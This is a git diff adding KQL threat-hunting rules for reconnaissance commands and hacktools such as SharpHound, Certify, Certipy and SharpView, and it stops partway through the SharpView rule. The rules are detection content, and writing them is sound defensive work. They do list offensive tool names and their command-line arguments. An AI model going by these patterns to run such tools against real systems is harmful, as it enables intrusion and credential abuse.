index 00000000..25950e0e --- /dev/null +++ b/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql @@ -0,0 +1,13 @@ +// Title: Console CodePage Lookup Via CHCP +// Author: _pete_0, TheDFIRReport +// Date: 2022-02-21 +// Level: medium +// Description: Detects use of chcp to look up the system locale value as part of host discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1614.001 +// False Positives: +// - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command. +// - Discord was seen using chcp to look up code pages + +DeviceProcessEvents +| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " –c " or InitiatingProcessCommandLine contains " —c " or InitiatingProcessCommandLine contains " ―c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " –r " or InitiatingProcessCommandLine contains " —r " or InitiatingProcessCommandLine contains " ―r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k " or InitiatingProcessCommandLine contains " –k " or InitiatingProcessCommandLine contains " —k " or InitiatingProcessCommandLine contains " ―k ") and InitiatingProcessFolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql new file mode 100644 index 00000000..3a44de69 --- /dev/null +++ b/KQL/rules/Discovery/container_residence_discovery_via_proc_virtual_fs.kql @@ -0,0 +1,13 @@ +// Title: Container Residence Discovery Via Proc Virtual FS +// Author: Seth Hanford +// Date: 2023-08-23 +// Level: low +// Description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate system administrator usage of these commands +// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered + +DeviceProcessEvents +| where (FolderPath endswith "awk" or FolderPath endswith "/cat" or FolderPath endswith "grep" or FolderPath endswith "/head" or FolderPath endswith "/less" or FolderPath endswith "/more" or FolderPath endswith "/nl" or FolderPath endswith "/tail") and (ProcessCommandLine contains "/proc/2/" or (ProcessCommandLine contains "/proc/" and (ProcessCommandLine endswith "/cgroup" or ProcessCommandLine endswith "/sched"))) \ No newline at end of file diff --git a/KQL/rules/Discovery/crontab_enumeration.kql b/KQL/rules/Discovery/crontab_enumeration.kql new file mode 100644 index 00000000..5aa3bfde --- /dev/null +++ b/KQL/rules/Discovery/crontab_enumeration.kql @@ -0,0 +1,12 @@ +// Title: Crontab Enumeration +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: low +// Description: Detects usage of crontab to list the tasks of the user +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1007 +// False Positives: +// - Legitimate use of crontab + +DeviceProcessEvents +| where ProcessCommandLine contains " -l" and FolderPath endswith "/crontab" \ No newline at end of file diff --git a/KQL/rules/Discovery/detected_windows_software_discovery.kql b/KQL/rules/Discovery/detected_windows_software_discovery.kql new file mode 100644 index 00000000..5b796643 --- /dev/null +++ b/KQL/rules/Discovery/detected_windows_software_discovery.kql @@ -0,0 +1,12 @@ +// Title: Detected Windows Software Discovery +// Author: Nikita Nazarov, oscd.community +// Date: 2020-10-16 +// Level: medium +// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1518 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/dirlister_execution.kql b/KQL/rules/Discovery/dirlister_execution.kql new file mode 100644 index 00000000..db43c8f5 --- /dev/null +++ b/KQL/rules/Discovery/dirlister_execution.kql @@ -0,0 +1,12 @@ +// Title: DirLister Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: low +// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate use by users + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/discovery_of_a_system_time.kql b/KQL/rules/Discovery/discovery_of_a_system_time.kql new file mode 100644 index 00000000..f7f0f43d --- /dev/null +++ b/KQL/rules/Discovery/discovery_of_a_system_time.kql @@ -0,0 +1,12 @@ +// Title: Discovery of a System Time +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: low +// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1124 +// False Positives: +// - Legitimate use of the system utilities to discover system time for legitimate reason + +DeviceProcessEvents +| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql new file mode 100644 index 00000000..7b0c1a73 --- /dev/null +++ b/KQL/rules/Discovery/docker_container_discovery_via_dockerenv_listing.kql @@ -0,0 +1,13 @@ +// Title: Docker Container Discovery Via Dockerenv Listing +// Author: Seth Hanford +// Date: 2023-08-23 +// Level: low +// Description: Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1082 +// False Positives: +// - Legitimate system administrator usage of these commands +// - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered + +DeviceProcessEvents +| where ProcessCommandLine endswith ".dockerenv" and (FolderPath endswith "/cat" or FolderPath endswith "/dir" or FolderPath endswith "/find" or FolderPath endswith "/ls" or FolderPath endswith "/stat" or FolderPath endswith "/test" or FolderPath endswith "grep") \ No newline at end of file diff --git a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql new file mode 100644 index 00000000..ca6a57b8 --- /dev/null +++ b/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql @@ -0,0 +1,12 @@ +// Title: Domain Trust Discovery Via Dsquery +// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72 +// Date: 2019-10-24 +// Level: medium +// Description: Detects execution of "dsquery.exe" for domain trust discovery +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1482 +// False Positives: +// - Legitimate use of the utilities by legitimate user for legitimate reason + +DeviceProcessEvents +| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/driverquery_exe_execution.kql b/KQL/rules/Discovery/driverquery_exe_execution.kql new file mode 100644 index 00000000..7b80e2e6 --- /dev/null +++ b/KQL/rules/Discovery/driverquery_exe_execution.kql @@ -0,0 +1,12 @@ +// Title: DriverQuery.EXE Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-19 +// Level: medium +// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers +// MITRE Tactic: Discovery +// Tags: attack.discovery +// False Positives: +// - Legitimate use by third party tools in order to investigate installed drivers + +DeviceProcessEvents +| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql new file mode 100644 index 00000000..c1fbed8e --- /dev/null +++ b/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql @@ -0,0 +1,10 @@ +// Title: Enumerate All Information With Whoami.EXE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-12-04 +// Level: medium +// Description: Detects the execution of "whoami.exe" with the "/all" flag +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all" or ProcessCommandLine contains " –all" or ProcessCommandLine contains " —all" or ProcessCommandLine contains " ―all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql new file mode 100644 index 00000000..7ad955ff --- /dev/null +++ b/KQL/rules/Discovery/esxi_network_configuration_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi Network Configuration Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "network" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql new file mode 100644 index 00000000..0a0a16b8 --- /dev/null +++ b/KQL/rules/Discovery/esxi_storage_information_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi Storage Information Discovery Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "storage" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql new file mode 100644 index 00000000..c1e30e5f --- /dev/null +++ b/KQL/rules/Discovery/esxi_system_information_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi System Information Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "system" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql new file mode 100644 index 00000000..b5c6d21d --- /dev/null +++ b/KQL/rules/Discovery/esxi_vm_list_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi VM List Discovery Via ESXCLI +// Author: Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where ProcessCommandLine contains "vm process" and ProcessCommandLine endswith " list" and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql new file mode 100644 index 00000000..6c395381 --- /dev/null +++ b/KQL/rules/Discovery/esxi_vsan_information_discovery_via_esxcli.kql @@ -0,0 +1,12 @@ +// Title: ESXi VSAN Information Discovery Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.execution, attack.t1033, attack.t1007, attack.t1059.012 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " get" or ProcessCommandLine contains " list") and (ProcessCommandLine contains "vsan" and FolderPath endswith "/esxcli") \ No newline at end of file diff --git a/KQL/rules/Discovery/file_and_directory_discovery_linux.kql b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql new file mode 100644 index 00000000..b0ad098f --- /dev/null +++ b/KQL/rules/Discovery/file_and_directory_discovery_linux.kql @@ -0,0 +1,13 @@ +// Title: File and Directory Discovery - Linux +// Author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad +// Date: 2020-10-19 +// Level: informational +// Description: Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath endswith "/file") or FolderPath endswith "/find" or FolderPath endswith "/findmnt" or FolderPath endswith "/mlocate" or (ProcessCommandLine contains "-R" and FolderPath endswith "/ls") or FolderPath endswith "/tree" \ No newline at end of file diff --git a/KQL/rules/Discovery/file_and_directory_discovery_macos.kql b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql new file mode 100644 index 00000000..86fe2a14 --- /dev/null +++ b/KQL/rules/Discovery/file_and_directory_discovery_macos.kql @@ -0,0 +1,12 @@ +// Title: File and Directory Discovery - MacOS +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: informational +// Description: Detects usage of system utilities to discover files and directories +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath =~ "/usr/bin/file") or FolderPath =~ "/usr/bin/find" or FolderPath =~ "/usr/bin/mdfind" or (ProcessCommandLine contains "-R" and FolderPath =~ "/bin/ls") or FolderPath =~ "/tree" \ No newline at end of file diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql new file mode 100644 index 00000000..f0558c42 --- /dev/null +++ b/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql @@ -0,0 +1,13 @@ +// Title: File And SubFolder Enumeration Via Dir Command +// Author: frack113 +// Date: 2021-12-13 +// Level: low +// Description: Detects usage of the "dir" command part of Windows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1217 +// False Positives: +// - Likely + +DeviceProcessEvents +| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*" or ProcessCommandLine =~ "*dir*–s*" or ProcessCommandLine =~ "*dir*—s*" or ProcessCommandLine =~ "*dir*―s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql new file mode 100644 index 00000000..a5a3af68 --- /dev/null +++ b/KQL/rules/Discovery/file_explorer_folder_opened_using_explorer_folder_shortcut_via_shell.kql @@ -0,0 +1,11 @@ +// Title: File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell +// Author: @Kostastsale +// Date: 2022-12-22 +// Level: high +// Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1135 + +DeviceProcessEvents +| where ProcessCommandLine contains "shell:mycomputerfolder" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql new file mode 100644 index 00000000..5e764c85 --- /dev/null +++ b/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql @@ -0,0 +1,12 @@ +// Title: Firewall Configuration Discovery Via Netsh.EXE +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-12-07 +// Level: low +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1016 +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh" and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/fsutil_drive_enumeration.kql b/KQL/rules/Discovery/fsutil_drive_enumeration.kql new file mode 100644 index 00000000..93fb63d7 --- /dev/null +++ b/KQL/rules/Discovery/fsutil_drive_enumeration.kql @@ -0,0 +1,12 @@ +// Title: Fsutil Drive Enumeration +// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2022-03-29 +// Level: low +// Description: Attackers may leverage fsutil to enumerated connected drives. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1120 +// False Positives: +// - Certain software or administrative tasks may trigger false positives. + +DeviceProcessEvents +| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql new file mode 100644 index 00000000..0e070409 --- /dev/null +++ b/KQL/rules/Discovery/gathernetworkinfo_vbs_reconnaissance_script_output.kql @@ -0,0 +1,10 @@ +// Title: GatherNetworkInfo.VBS Reconnaissance Script Output +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceFileEvents +| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config" \ No newline at end of file diff --git a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql new file mode 100644 index 00000000..24b11f4e --- /dev/null +++ b/KQL/rules/Discovery/gpresult_display_group_policy_information.kql @@ -0,0 +1,10 @@ +// Title: Gpresult Display Group Policy Information +// Author: frack113 +// Date: 2022-05-01 +// Level: medium +// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1615 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe" \ No newline at end of file diff --git a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql new file mode 100644 index 00000000..c3ec9a4d --- /dev/null +++ b/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql @@ -0,0 +1,10 @@ +// Title: Group Membership Reconnaissance Via Whoami.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-28 +// Level: medium +// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033 + +DeviceProcessEvents +| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql new file mode 100644 index 00000000..986fc84f --- /dev/null +++ b/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - Bloodhound/Sharphound Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-20 +// Level: high +// Description: Detects command line parameters used by Bloodhound and Sharphound hack tools +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 +// False Positives: +// - Other programs that use these command line option and accepts an 'All' parameter + +DeviceProcessEvents +| where (ProcessCommandLine contains " -CollectionMethod All " or ProcessCommandLine contains " --CollectionMethods Session " or ProcessCommandLine contains " --Loop --Loopduration " or ProcessCommandLine contains " --PortScanTimeout " or ProcessCommandLine contains ".exe -c All -d " or ProcessCommandLine contains "Invoke-Bloodhound" or ProcessCommandLine contains "Get-BloodHoundData") or (ProcessCommandLine contains " -JsonFolder " and ProcessCommandLine contains " -ZipFileName ") or (ProcessCommandLine contains " DCOnly " and ProcessCommandLine contains " --NoSaveCache ") or (ProcessVersionInfoProductName contains "SharpHound" or ProcessVersionInfoFileDescription contains "SharpHound" or (ProcessVersionInfoCompanyName contains "SpecterOps" or ProcessVersionInfoCompanyName contains "evil corp") or (FolderPath contains "\\Bloodhound.exe" or FolderPath contains "\\SharpHound.exe")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_certify_execution.kql b/KQL/rules/Discovery/hacktool_certify_execution.kql new file mode 100644 index 00000000..86ad786b --- /dev/null +++ b/KQL/rules/Discovery/hacktool_certify_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - Certify Execution +// Author: pH-T (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 + +DeviceProcessEvents +| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/Discovery/hacktool_certipy_execution.kql new file mode 100644 index 00000000..91f88bca --- /dev/null +++ b/KQL/rules/Discovery/hacktool_certipy_execution.kql @@ -0,0 +1,13 @@ +// Title: HackTool - Certipy Execution +// Author: pH-T (Nextron Systems), Sittikorn Sangrattanapitak +// Date: 2023-04-17 +// Level: high +// Description: Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. + +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.credential-access, attack.t1649 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " account " or ProcessCommandLine contains " auth " or ProcessCommandLine contains " cert " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " ptt " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow " or ProcessCommandLine contains " template ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -template" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list")) \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql new file mode 100644 index 00000000..426d1dbd --- /dev/null +++ b/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - SharpLDAPmonitor Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-30 +// Level: medium +// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. +// MITRE Tactic: Discovery +// Tags: attack.discovery + +DeviceProcessEvents +| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql new file mode 100644 index 00000000..692e24e8 --- /dev/null +++ b/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql @@ -0,0 +1,12 @@ +// Title: HackTool - SharpLdapWhoami Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-29 +// Level: high +// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1033, car.2016-03-001 +// False Positives: +// - Programs that use the same command line flags + +DeviceProcessEvents +| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami") \ No newline at end of file diff --git a/KQL/rules/Discovery/hacktool_sharpview_execution.kql b/KQL/rules/Discovery/hacktool_sharpview_execution.kql new file mode 100644 index 00000000..7e30744c --- /dev/null +++ b/KQL/rules/Discovery/hacktool_sharpview_execution.kql @@ -0,0 +1,10 @@ +// Title: HackTool - SharpView Execution +// Author: frack113 +// Date: 2021-12-10 +// Level: high +// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or 